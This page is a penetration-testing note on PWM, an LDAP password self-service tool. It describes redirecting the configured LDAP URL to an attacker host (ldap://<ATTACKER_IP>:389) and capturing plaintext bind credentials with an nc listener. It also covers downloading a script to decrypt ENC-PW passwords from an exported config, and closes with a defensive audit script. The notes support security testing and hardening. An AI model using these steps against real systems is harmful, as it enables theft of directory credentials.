PRIMARY CATEGORY → WEB TECHNOLOGIES

Theory

An open source password self-service application for LDAP directories.

Modes
Open Configuration

In this PWM mode, some interesting configuration information can be gathered without any prior authentication.

However, authentication is still required for any action that changes or modifies configured parameters within the control panel.


Forcing LDAP Connection to retrieve Plain Credentials

Once we obtain valid credentials to authenticate ourselves against the PWM control panel, we can look for any configured LDAP connection, as it usually contains LDAP credentials:

Configuration Editor → LDAP → LDAP Directories → <DIRECTORY> → Connection

However, we cannot extract the LDAP password in plain text from the connection section, as it is stored encrypted within the PwmConfiguration.xml file.

But we can replace the existing LDAP URL with the one below:

ldap://<ATTACKER_IP>:389

When we then click the Test LDAP Profile button, the application performs an LDAP bind against our server. Because we replaced ldaps with ldap, the data is transmitted without encryption, so we can grab the plain credentials.

It is not necessary to set up an LDAP server; we can receive the incoming LDAP authentication with a plain TCP listener on port 389 as follows:

nc -lnvp 389

Decrypting stored LDAP Credentials

Another way to extract LDAP credentials in plain text from PWM is to decrypt the credentials stored within PwmConfiguration.xml.

If we have valid credentials to authenticate against the PWM control panel, we can export this configuration file from the PWM Configuration Manager.

Once we have downloaded it, the process is as simple as follows.

Downloading a PWM Decryption Utility

PWM_decrypt.py

curl --silent --location --request GET --remote-name 'https://gist.github.com/hadrian3689/471f0942588529a353c0020eaea5ddc2/raw/4a3d27c311a684f41729caa4f56728fbb924243e/pwm_decrypt.py'

Replacing data within the utility

The tool in question does not have a parameter parser, so we must replace the following information with the appropriate values:

  • Key

    Parameter: key = "<VALUE>StoredConfiguration"

    Value: the createTime attribute's value

    ...<SNIP>...<PwmConfiguration createTime="2022-08-11T01:46:23Z"...<SNIP>...

  • Encrypted Text

    Parameter: encrypted_text = "<VALUE>"

    Value: the Base64 string without the ENC-PW: prefix

    <value>ENC-PW:SbynUzwVEFXBLHfFwVwcL0wdJhqOB0oaXb3QkEXCvJ3LyHo6pJ0q327iwGi0WW51TYfsZfkLaNHbjGfbQldz5EW7BqPxGqzMz+bEfyPIvA8=</value>

Decrypting the data

Setup

mkdir PWMDecrypt
cd !$ && python3 -m venv .venv
. !$/bin/activate && pip3 install pycryptodome

Usage

python3 pwm_decrypt.py
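Both weaknesses above (a profile reachable over plain ldap:// and ENC-PW values whose key is derived from createTime) can be spotted in an exported PwmConfiguration.xml before it leaves the box. The following audit script is an added example, not part of these notes or of PWM; the XML layout, the setting keys (ldap.serverUrls, ldap.proxy.password) and the sample export are assumed and constructed from what the page shows.

```python
"""Audit an exported PwmConfiguration.xml for non-TLS LDAP URLs and ENC-PW values.

Added example; the XML layout and setting keys are assumed from the fragments
shown above, so adjust the tag/attribute names to a real export if they differ.
"""
import xml.etree.ElementTree as ET

# Constructed sample export: one plaintext ldap:// URL, one ldaps:// URL and an
# ENC-PW proxy password (the Base64 payload is a dummy value, not real data).
SAMPLE_CONFIG = """<PwmConfiguration createTime="2022-08-11T01:46:23Z">
  <settings>
    <setting key="ldap.serverUrls" profile="default">
      <value>ldap://dc01.corp.example:389</value>
      <value>ldaps://dc02.corp.example:636</value>
    </setting>
    <setting key="ldap.proxy.password" profile="default">
      <value>ENC-PW:QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo=</value>
    </setting>
  </settings>
</PwmConfiguration>
"""


def audit_pwm_config(xml_text: str) -> dict:
    """Return createTime, every plaintext ldap:// URL and every ENC-PW setting."""
    root = ET.fromstring(xml_text)
    findings = {
        # createTime is half of the decryption key the page describes, so an
        # exported file carries both the ciphertext and the key material.
        "create_time": root.get("createTime"),
        "plaintext_ldap_urls": [],
        "enc_pw_settings": [],
    }
    for setting in root.iter("setting"):
        key = setting.get("key", "")
        for value in setting.findall("value"):
            text = (value.text or "").strip()
            # ldap:// (not ldaps://) means the bind credentials cross the wire
            # unencrypted, which is what the Test LDAP Profile trick relies on.
            if text.lower().startswith("ldap://"):
                findings["plaintext_ldap_urls"].append((key, text))
            # ENC-PW values are reversible with the createTime-derived key, so
            # treat any export containing them as holding cleartext secrets.
            if text.startswith("ENC-PW:"):
                findings["enc_pw_settings"].append(key)
    return findings


if __name__ == "__main__":
    for name, items in audit_pwm_config(SAMPLE_CONFIG).items():
        print(f"{name}: {items}")
```

Run it against a real export (read the file into `audit_pwm_config`) and fix any ldap:// profile to ldaps:// before the config is shared or backed up.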

Resources

PWM

PWM Decrypt